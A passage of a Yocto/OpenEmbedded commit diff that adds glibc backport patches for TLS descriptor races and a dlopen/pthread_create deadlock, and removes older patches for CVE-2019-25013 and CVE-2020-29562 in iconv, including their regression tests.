86@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()"));
87 state if relocation failed, for example. */
88 if (args.map)
89 {
90- /* Maybe some of the modules which were loaded use TLS.
91- Since it will be removed in the following _dl_close call
92- we have to mark the dtv array as having gaps to fill the
93- holes. This is a pessimistic assumption which won't hurt
94- if not true. There is no need to do this when we are
95- loading the auditing DSOs since TLS has not yet been set
96- up. */
97- if ((mode & __RTLD_AUDIT) == 0)
98- GL(dl_tls_dtv_gaps) = true;
99-
100 _dl_close_worker (args.map, true);
101
102 /* All l_nodelete_pending objects should have been deleted
103diff --git a/elf/dl-tls.c b/elf/dl-tls.c
104index 2b5161d10a..423e380f7c 100644
105--- a/elf/dl-tls.c
106+++ b/elf/dl-tls.c
107@@ -126,8 +126,8 @@ oom (void)
108 }
109
110
111-size_t
112-_dl_next_tls_modid (void)
113+void
114+_dl_assign_tls_modid (struct link_map *l)
115 {
116 size_t result;
117
118@@ -157,7 +157,11 @@ _dl_next_tls_modid (void)
119 }
120
121 if (result - disp < runp->len)
122- break;
123+ {
124+ /* Mark the entry as used, so any dependency see it. */
125+ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l);
126+ break;
127+ }
128
129 disp += runp->len;
130 }
131@@ -184,17 +188,14 @@ _dl_next_tls_modid (void)
132 atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
133 }
134
135- return result;
136+ l->l_tls_modid = result;
137 }
138
139
140 size_t
141 _dl_count_modids (void)
142 {
143- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where
144- we fail to load a module and unload it leaving a gap. If we don't
145- have gaps then the number of modids is the current maximum so
146- return that. */
147+ /* The count is the max unless dlclose or failed dlopen created gaps. */
148 if (__glibc_likely (!GL(dl_tls_dtv_gaps)))
149 return GL(dl_tls_max_dtv_idx);
150
151diff --git a/elf/rtld.c b/elf/rtld.c
152index e3fb2a5b2a..d733359eaf 100644
153--- a/elf/rtld.c
154+++ b/elf/rtld.c
155@@ -1612,7 +1612,7 @@
156 /* Add the dynamic linker to the TLS list if it also uses TLS. */
157 if (GL(dl_rtld_map).l_tls_blocksize != 0)
158 /* Assign a module ID. Do this before loading any audit modules. */
159- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid ();
160+ _dl_assign_tls_modid (&GL(dl_rtld_map));
161
162 /* If we have auditing DSOs to load, do it now. */
163 bool need_security_init = true;
164diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
165index 176394de4d..9c15259236 100644
166--- a/sysdeps/generic/ldsodefs.h
167+++ b/sysdeps/generic/ldsodefs.h
168@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr,
169 extern void _dl_sysdep_start_cleanup (void) attribute_hidden;
170
171
172-/* Determine next available module ID. */
173-extern size_t _dl_next_tls_modid (void) attribute_hidden;
174+/* Determine next available module ID and set the L l_tls_modid. */
175+extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden;
176
177 /* Count the modules with TLS segments. */
178 extern size_t _dl_count_modids (void) attribute_hidden;
179--
1802.27.0
diff --git a/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..899111b118
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,56 @@
1From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Thu, 11 Feb 2021 11:29:23 +0000
4Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137]
5
6Lazy tlsdesc relocation is racy because the static tls optimization and
7tlsdesc management operations are done without holding the dlopen lock.
8
9This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
10for aarch64, but it fixes a different race: bug 27137.
11
12Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to
13relocate tlsdesc lazily, but that does not work in a BIND_NOW module
14due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at
15load time fixes this bug 27721 too.
16---
17 sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++-----
18 1 file changed, 14 insertions(+), 5 deletions(-)
19---
20Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86]
21Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
22Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
23---
24diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h
25index 103eee6c3f..9a876a371e 100644
26--- a/sysdeps/x86_64/dl-machine.h
27+++ b/sysdeps/x86_64/dl-machine.h
28@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map,
29 }
30 else if (__glibc_likely (r_type == R_X86_64_TLSDESC))
31 {
32- struct tlsdesc volatile * __attribute__((__unused__)) td =
33- (struct tlsdesc volatile *)reloc_addr;
34+ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
35+ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
36+ const ElfW (Sym) *sym = &symtab[symndx];
37+ const struct r_found_version *version = NULL;
38
39- td->arg = (void*)reloc;
40- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)])
41- + map->l_addr);
42+ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
43+ {
44+ const ElfW (Half) *vernum =
45+ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
46+ version = &map->l_versions[vernum[symndx] & 0x7fff];
47+ }
48+
49+ /* Always initialize TLS descriptors completely at load time, in
50+ case static TLS is allocated for it that requires locking. */
51+ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
52 }
53 else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE))
54 {
55--
562.27.0
diff --git a/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..ad0a1147aa
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,124 @@
1From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Thu, 11 Feb 2021 11:40:11 +0000
4Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137]
5
6Lazy tlsdesc relocation is racy because the static tls optimization and
7tlsdesc management operations are done without holding the dlopen lock.
8
9This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
10for aarch64, but it fixes a different race: bug 27137.
11
12On i386 the code is a bit more complicated than on x86_64 because both
13rel and rela relocs are supported.
14---
15 sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++---------------------
16 1 file changed, 34 insertions(+), 42 deletions(-)
17---
18Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d]
19Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
20Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
21---
22diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h
23index 23e9cc3bfb..590b41d8d7 100644
24--- a/sysdeps/i386/dl-machine.h
25+++ b/sysdeps/i386/dl-machine.h
26@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map,
27 }
28 else if (__glibc_likely (r_type == R_386_TLS_DESC))
29 {
30- struct tlsdesc volatile * __attribute__((__unused__)) td =
31- (struct tlsdesc volatile *)reloc_addr;
32-
33- /* Handle relocations that reference the local *ABS* in a simple
34- way, so as to preserve a potential addend. */
35- if (ELF32_R_SYM (reloc->r_info) == 0)
36- td->entry = _dl_tlsdesc_resolve_abs_plus_addend;
37- /* Given a known-zero addend, we can store a pointer to the
38- reloc in the arg position. */
39- else if (td->arg == 0)
40- {
41- td->arg = (void*)reloc;
42- td->entry = _dl_tlsdesc_resolve_rel;
43- }
44- else
45- {
46- /* We could handle non-*ABS* relocations with non-zero addends
47- by allocating dynamically an arg to hold a pointer to the
48- reloc, but that sounds pointless. */
49- const Elf32_Rel *const r = reloc;
50- /* The code below was borrowed from elf_dynamic_do_rel(). */
51- const ElfW(Sym) *const symtab =
52- (const void *) D_PTR (map, l_info[DT_SYMTAB]);
53+ const Elf32_Rel *const r = reloc;
54+ /* The code below was borrowed from elf_dynamic_do_rel(). */
55+ const ElfW(Sym) *const symtab =
56+ (const void *) D_PTR (map, l_info[DT_SYMTAB]);
57
58+ /* Always initialize TLS descriptors completely at load time, in
59+ case static TLS is allocated for it that requires locking. */
60 # ifdef RTLD_BOOTSTRAP
61- /* The dynamic linker always uses versioning. */
62- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
63+ /* The dynamic linker always uses versioning. */
64+ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
65 # else
66- if (map->l_info[VERSYMIDX (DT_VERSYM)])
67+ if (map->l_info[VERSYMIDX (DT_VERSYM)])
68 # endif
69- {
70- const ElfW(Half) *const version =
71- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
72- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
73- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
74- &map->l_versions[ndx],
75- (void *) (l_addr + r->r_offset), skip_ifunc);
76- }
77+ {
78+ const ElfW(Half) *const version =
79+ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
80+ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
81+ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
82+ &map->l_versions[ndx],
83+ (void *) (l_addr + r->r_offset), skip_ifunc);
84+ }
85 # ifndef RTLD_BOOTSTRAP
86- else
87- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
88- (void *) (l_addr + r->r_offset), skip_ifunc);
89+ else
90+ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
91+ (void *) (l_addr + r->r_offset), skip_ifunc);
92 # endif
93- }
94 }
95 else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
96 {
97@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map,
98 ;
99 else if (__glibc_likely (r_type == R_386_TLS_DESC))
100 {
101- struct tlsdesc volatile * __attribute__((__unused__)) td =
102- (struct tlsdesc volatile *)reloc_addr;
103+ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
104+ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
105+ const ElfW (Sym) *sym = &symtab[symndx];
106+ const struct r_found_version *version = NULL;
107+
108+ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
109+ {
110+ const ElfW (Half) *vernum =
111+ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
112+ version = &map->l_versions[vernum[symndx] & 0x7fff];
113+ }
114
115- td->arg = (void*)reloc;
116- td->entry = _dl_tlsdesc_resolve_rela;
117+ /* Always initialize TLS descriptors completely at load time, in
118+ case static TLS is allocated for it that requires locking. */
119+ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
120 }
121 else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
122 {
123--
1242.27.0
diff --git a/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
new file mode 100644
index 0000000000..7a10131bad
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
@@ -0,0 +1,276 @@
1From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 15 Sep 2021 15:16:19 +0100
4Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ
5 #28357]
6
7The fix for bug 19329 caused a regression such that pthread_create can
8deadlock when concurrent ctors from dlopen are waiting for it to finish.
9Use a new GL(dl_load_tls_lock) in pthread_create that is not taken
10around ctors in dlopen.
11
12The new lock is also used in __tls_get_addr instead of GL(dl_load_lock).
13
14The new lock is held in _dl_open_worker and _dl_close_worker around
15most of the logic before/after the init/fini routines. When init/fini
16routines are running then TLS is in a consistent, usable state.
17In _dl_open_worker the new lock requires catching and reraising dlopen
18failures that happen in the critical section.
19
20The new lock is reinitialized in a fork child, to keep the existing
21behaviour and it is kept recursive in case malloc interposition or TLS
22access from signal handlers can retake it. It is not obvious if this
23is necessary or helps, but avoids changing the preexisting behaviour.
24
25The new lock may be more appropriate for dl_iterate_phdr too than
26GL(dl_load_write_lock), since TLS state of an incompletely loaded
27module may be accessed. If the new lock can replace the old one,
28that can be a separate change.
29
30Fixes bug 28357.
31
32Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
33---
34 elf/dl-close.c | 6 ++
35 elf/dl-open.c | 35 ++++++++-
36 elf/dl-support.c | 7 ++
37 elf/dl-tls.c | 16 ++---
38 elf/rtld.c | 1 +
39 sysdeps/nptl/fork.c | 3 +
40 sysdeps/generic/ldsodefs.h | 9 ++-
41 10 files changed, 235 insertions(+), 12 deletions(-)
42---
43Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5]
44Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case.
45Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
46Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
47---
48diff --git a/elf/dl-close.c b/elf/dl-close.c
49index 93ff5c96e9..cfe0f1c0c9 100644
50--- a/elf/dl-close.c
51+++ b/elf/dl-close.c
52@@ -551,6 +551,9 @@
53 size_t tls_free_end;
54 tls_free_start = tls_free_end = NO_TLS_OFFSET;
55
56+ /* Protects global and module specitic TLS state. */
57+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
58+
59 /* We modify the list of loaded objects. */
60 __rtld_lock_lock_recursive (GL(dl_load_write_lock));
61
62@@ -786,6 +789,9 @@
63 GL(dl_tls_static_used) = tls_free_start;
64 }
65
66+ /* TLS is cleaned up for the unloaded modules. */
67+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
68+
69 #ifdef SHARED
70 /* Auditing checkpoint: we have deleted all objects. */
71 if (__glibc_unlikely (do_audit))
72diff --git a/elf/dl-open.c b/elf/dl-open.c
73index 5295e931b0..6ea5dd2457 100644
74--- a/elf/dl-open.c
75+++ b/elf/dl-open.c
76@@ -57,6 +57,9 @@
77 (non-negative). */
78 unsigned int original_global_scope_pending_adds;
79
80+ /* Set to true if the end of dl_open_worker_begin was reached. */
81+ bool worker_continue;
82+
83 /* Original parameters to the program and the current environment. */
84 int argc;
85 char **argv;
86@@ -473,7 +473,7 @@
87 }
88
89 static void
90-dl_open_worker (void *a)
91+dl_open_worker_begin (void *a)
92 {
93 struct dl_open_args *args = a;
94 const char *file = args->file;
95@@ -747,6 +747,36 @@
96 if (mode & RTLD_GLOBAL)
97 add_to_global_resize (new);
98
99+ args->worker_continue = true;
100+}
101+
102+static void
103+dl_open_worker (void *a)
104+{
105+ struct dl_open_args *args = a;
106+
107+ args->worker_continue = false;
108+
109+ {
110+ /* Protects global and module specific TLS state. */
111+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
112+
113+ struct dl_exception ex;
114+ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args);
115+
116+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
117+
118+ if (__glibc_unlikely (ex.errstring != NULL))
119+ /* Reraise the error. */
120+ _dl_signal_exception (err, &ex, NULL);
121+ }
122+
123+ if (!args->worker_continue)
124+ return;
125+
126+ int mode = args->mode;
127+ struct link_map *new = args->map;
128+
129 /* Run the initializer functions of new objects. Temporarily
130 disable the exception handler, so that lazy binding failures are
131 fatal. */
132diff --git a/elf/dl-support.c b/elf/dl-support.c
133index 02e2ed72f5..d99c1f1d62 100644
134--- a/elf/dl-support.c
135+++ b/elf/dl-support.c
136@@ -219,6 +219,13 @@
137 list of loaded objects while an object is added to or removed from
138 that list. */
139 __rtld_lock_define_initialized_recursive (, _dl_load_write_lock)
140+/* This lock protects global and module specific TLS related data.
141+ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
142+ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
143+ accessed and when TLS related relocations are processed for a
144+ module. It was introduced to keep pthread_create accessing TLS
145+ state that is being set up. */
146+__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock)
147
148
149 #ifdef HAVE_AUX_VECTOR
150diff --git a/elf/dl-tls.c b/elf/dl-tls.c
151index d554ae4497..9260d2d696 100644
152--- a/elf/dl-tls.c
153+++ b/elf/dl-tls.c
154@@ -443,7 +443,7 @@
155 size_t maxgen = 0;
156
157 /* Protects global dynamic TLS related state. */
158- __rtld_lock_lock_recursive (GL(dl_load_lock));
159+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
160
161 /* Check if the current dtv is big enough. */
162 if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
163@@ -517,7 +517,7 @@
164 listp = listp->next;
165 assert (listp != NULL);
166 }
167- __rtld_lock_unlock_recursive (GL(dl_load_lock));
168+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
169
170 /* The DTV version is up-to-date now. */
171 dtv[0].counter = maxgen;
172@@ -656,7 +656,7 @@
173
174 Here the dtv needs to be updated to new_gen generation count.
175
176- This code may be called during TLS access when GL(dl_load_lock)
177+ This code may be called during TLS access when GL(dl_load_tls_lock)
178 is not held. In that case the user code has to synchronize with
179 dlopen and dlclose calls of relevant modules. A module m is
180 relevant if the generation of m <= new_gen and dlclose of m is
181@@ -778,11 +778,11 @@
182 if (__glibc_unlikely (the_map->l_tls_offset
183 != FORCED_DYNAMIC_TLS_OFFSET))
184 {
185- __rtld_lock_lock_recursive (GL(dl_load_lock));
186+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
187 if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET))
188 {
189 the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET;
190- __rtld_lock_unlock_recursive (GL(dl_load_lock));
191+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
192 }
193 else if (__glibc_likely (the_map->l_tls_offset
194 != FORCED_DYNAMIC_TLS_OFFSET))
195@@ -794,7 +794,7 @@
196 #else
197 # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined"
198 #endif
199- __rtld_lock_unlock_recursive (GL(dl_load_lock));
200+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
201
202 dtv[GET_ADDR_MODULE].pointer.to_free = NULL;
203 dtv[GET_ADDR_MODULE].pointer.val = p;
204@@ -802,7 +802,7 @@
205 return (char *) p + GET_ADDR_OFFSET;
206 }
207 else
208- __rtld_lock_unlock_recursive (GL(dl_load_lock));
209+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
210 }
211 struct dtv_pointer result = allocate_and_init (the_map);
212 dtv[GET_ADDR_MODULE].pointer = result;
213@@ -873,7 +873,7 @@
214 return NULL;
215
216 dtv_t *dtv = THREAD_DTV ();
217- /* This may be called without holding the GL(dl_load_lock). Reading
218+ /* This may be called without holding the GL(dl_load_tls_lock). Reading
219 arbitrary gen value is fine since this is best effort code. */
220 size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
221 if (__glibc_unlikely (dtv[0].counter != gen))
222diff --git a/elf/rtld.c b/elf/rtld.c
223index 8d2bba3d43..9642eb9c92 100644
224--- a/elf/rtld.c
225+++ b/elf/rtld.c
226@@ -283,6 +283,7 @@
227 #ifdef _LIBC_REENTRANT
228 ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
229 ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
230+ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
231 #endif
232 ._dl_nns = 1,
233 ._dl_ns =
234diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c
235index c471f7b15f..021691b9b7 100644
236--- a/sysdeps/nptl/fork.c
237+++ b/sysdeps/nptl/fork.c
238@@ -125,6 +125,9 @@
239 /* Reset the lock the dynamic loader uses to protect its data. */
240 __rtld_lock_initialize (GL(dl_load_lock));
241
242+ /* Reset the lock protecting dynamic TLS related data. */
243+ __rtld_lock_initialize (GL(dl_load_tls_lock));
244+
245 /* Run the handlers registered for the child. */
246 __run_fork_handlers (atfork_run_child, multiple_threads);
247 }
248diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
249index d49529da0d..9ec1511bb0 100644
250--- a/sysdeps/generic/ldsodefs.h
251+++ b/sysdeps/generic/ldsodefs.h
252@@ -369,6 +369,13 @@
253 list of loaded objects while an object is added to or removed
254 from that list. */
255 __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock)
256+ /* This lock protects global and module specific TLS related data.
257+ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
258+ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
259+ accessed and when TLS related relocations are processed for a
260+ module. It was introduced to keep pthread_create accessing TLS
261+ state that is being set up. */
262+ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock)
263
264 /* Incremented whenever something may have been added to dl_loaded. */
265 EXTERN unsigned long long _dl_load_adds;
266@@ -1153,7 +1160,7 @@
267
268 /* Add module to slot information data. If DO_ADD is false, only the
269 required memory is allocated. Must be called with GL
270- (dl_load_lock) acquired. If the function has already been called
271+ (dl_load_tls_lock) acquired. If the function has already been called
272 for the link map L with !do_add, then this function will not raise
273 an exception, otherwise it is possible that it encounters a memory
274 allocation failure. */
275--
2762.27.0
diff --git a/meta/recipes-core/glibc/glibc/CVE-2019-25013.patch b/meta/recipes-core/glibc/glibc/CVE-2019-25013.patch
deleted file mode 100644
index 73df1da868..0000000000
--- a/meta/recipes-core/glibc/glibc/CVE-2019-25013.patch
+++ /dev/null
@@ -1,135 +0,0 @@
1From ee7a3144c9922808181009b7b3e50e852fb4999b Mon Sep 17 00:00:00 2001
2From: Andreas Schwab <schwab@suse.de>
3Date: Mon, 21 Dec 2020 08:56:43 +0530
4Subject: [PATCH] Fix buffer overrun in EUC-KR conversion module (bz #24973)
5
6The byte 0xfe as input to the EUC-KR conversion denotes a user-defined
7area and is not allowed. The from_euc_kr function used to skip two bytes
8when told to skip over the unknown designation, potentially running over
9the buffer end.
10
11Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ee7a3144c9922808181009b7b3e50e852fb4999b]
12CVE: CVE-2019-25013
13Signed-off-by: Scott Murray <scott.murray@konsulko.com>
14[Refreshed for Dundell context; Makefile changes]
15Signed-off-by: Armin Kuster <akuster@mvista.com>
16
17---
18 iconvdata/Makefile | 3 ++-
19 iconvdata/bug-iconv13.c | 53 +++++++++++++++++++++++++++++++++++++++++
20 iconvdata/euc-kr.c | 6 +----
21 iconvdata/ksc5601.h | 6 ++---
22 4 files changed, 59 insertions(+), 9 deletions(-)
23 create mode 100644 iconvdata/bug-iconv13.c
24
25Index: git/iconvdata/Makefile
26===================================================================
27--- git.orig/iconvdata/Makefile
28+++ git/iconvdata/Makefile
29@@ -73,7 +73,7 @@ modules.so := $(addsuffix .so, $(modules
30 ifeq (yes,$(build-shared))
31 tests = bug-iconv1 bug-iconv2 tst-loading tst-e2big tst-iconv4 bug-iconv4 \
32 tst-iconv6 bug-iconv5 bug-iconv6 tst-iconv7 bug-iconv8 bug-iconv9 \
33- bug-iconv10 bug-iconv11 bug-iconv12
34+ bug-iconv10 bug-iconv11 bug-iconv12 bug-iconv13
35 ifeq ($(have-thread-library),yes)
36 tests += bug-iconv3
37 endif
38Index: git/iconvdata/bug-iconv13.c
39===================================================================
40--- /dev/null
41+++ git/iconvdata/bug-iconv13.c
42@@ -0,0 +1,53 @@
43+/* bug 24973: Test EUC-KR module
44+ Copyright (C) 2020 Free Software Foundation, Inc.
45+ This file is part of the GNU C Library.
46+
47+ The GNU C Library is free software; you can redistribute it and/or
48+ modify it under the terms of the GNU Lesser General Public
49+ License as published by the Free Software Foundation; either
50+ version 2.1 of the License, or (at your option) any later version.
51+
52+ The GNU C Library is distributed in the hope that it will be useful,
53+ but WITHOUT ANY WARRANTY; without even the implied warranty of
54+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
55+ Lesser General Public License for more details.
56+
57+ You should have received a copy of the GNU Lesser General Public
58+ License along with the GNU C Library; if not, see
59+ <https://www.gnu.org/licenses/>. */
60+
61+#include <errno.h>
62+#include <iconv.h>
63+#include <stdio.h>
64+#include <support/check.h>
65+
66+static int
67+do_test (void)
68+{
69+ iconv_t cd = iconv_open ("UTF-8//IGNORE", "EUC-KR");
70+ TEST_VERIFY_EXIT (cd != (iconv_t) -1);
71+
72+ /* 0xfe (->0x7e : row 94) and 0xc9 (->0x49 : row 41) are user-defined
73+ areas, which are not allowed and should be skipped over due to
74+ //IGNORE. The trailing 0xfe also is an incomplete sequence, which
75+ should be checked first. */
76+ char input[4] = { '\xc9', '\xa1', '\0', '\xfe' };
77+ char *inptr = input;
78+ size_t insize = sizeof (input);
79+ char output[4];
80+ char *outptr = output;
81+ size_t outsize = sizeof (output);
82+
83+ /* This used to crash due to buffer overrun. */
84+ TEST_VERIFY (iconv (cd, &inptr, &insize, &outptr, &outsize) == (size_t) -1);
85+ TEST_VERIFY (errno == EINVAL);
86+ /* The conversion should produce one character, the converted null
87+ character. */
88+ TEST_VERIFY (sizeof (output) - outsize == 1);
89+
90+ TEST_VERIFY_EXIT (iconv_close (cd) != -1);
91+
92+ return 0;
93+}
94+
95+#include <support/test-driver.c>
96Index: git/iconvdata/euc-kr.c
97===================================================================
98--- git.orig/iconvdata/euc-kr.c
99+++ git/iconvdata/euc-kr.c
100@@ -80,11 +80,7 @@ euckr_from_ucs4 (uint32_t ch, unsigned c
101 \
102 if (ch <= 0x9f) \
103 ++inptr; \
104- /* 0xfe(->0x7e : row 94) and 0xc9(->0x59 : row 41) are \
105- user-defined areas. */ \
106- else if (__builtin_expect (ch == 0xa0, 0) \
107- || __builtin_expect (ch > 0xfe, 0) \
108- || __builtin_expect (ch == 0xc9, 0)) \
109+ else if (__glibc_unlikely (ch == 0xa0)) \
110 { \
111 /* This is illegal. */ \
112 STANDARD_FROM_LOOP_ERR_HANDLER (1); \
113Index: git/iconvdata/ksc5601.h
114===================================================================
115--- git.orig/iconvdata/ksc5601.h
116+++ git/iconvdata/ksc5601.h
117@@ -50,15 +50,15 @@ ksc5601_to_ucs4 (const unsigned char **s
118 unsigned char ch2;
119 int idx;
120
121+ if (avail < 2)
122+ return 0;
123+
124 /* row 94(0x7e) and row 41(0x49) are user-defined area in KS C 5601 */
125
126 if (ch < offset || (ch - offset) <= 0x20 || (ch - offset) >= 0x7e
127 || (ch - offset) == 0x49)
128 return __UNKNOWN_10646_CHAR;
129
130- if (avail < 2)
131- return 0;
132-
133 ch2 = (*s)[1];
134 if (ch2 < offset || (ch2 - offset) <= 0x20 || (ch2 - offset) >= 0x7f)
135 return __UNKNOWN_10646_CHAR;
diff --git a/meta/recipes-core/glibc/glibc/CVE-2020-29562.patch b/meta/recipes-core/glibc/glibc/CVE-2020-29562.patch
deleted file mode 100644
index c51fb3223a..0000000000
--- a/meta/recipes-core/glibc/glibc/CVE-2020-29562.patch
+++ /dev/null
@@ -1,156 +0,0 @@
1From 228edd356f03bf62dcf2b1335f25d43c602ee68d Mon Sep 17 00:00:00 2001
2From: Michael Colavita <mcolavita@fb.com>
3Date: Thu, 19 Nov 2020 11:44:40 -0500
4Subject: [PATCH] iconv: Fix incorrect UCS4 inner loop bounds (BZ#26923)
5
6Previously, in UCS4 conversion routines we limit the number of
7characters we examine to the minimum of the number of characters in the
8input and the number of characters in the output. This is not the
9correct behavior when __GCONV_IGNORE_ERRORS is set, as we do not consume
10an output character when we skip a code unit. Instead, track the input
11and output pointers and terminate the loop when either reaches its
12limit.
13
14This resolves assertion failures when resetting the input buffer in a step of
15iconv, which assumes that the input will be fully consumed given sufficient
16output space.
17
18Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=228edd356f03bf62dcf2b1335f25d43c602ee68d]
19CVE: CVE-2020-29562
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21
22---
23 iconv/Makefile | 2 +-
24 iconv/gconv_simple.c | 16 ++++----------
25 iconv/tst-iconv8.c | 50 ++++++++++++++++++++++++++++++++++++++++++++
26 3 files changed, 55 insertions(+), 13 deletions(-)
27 create mode 100644 iconv/tst-iconv8.c
28
29diff --git a/iconv/Makefile b/iconv/Makefile
30index 30bf996d3a..f9b51e23ec 100644
31--- a/iconv/Makefile
32+++ b/iconv/Makefile
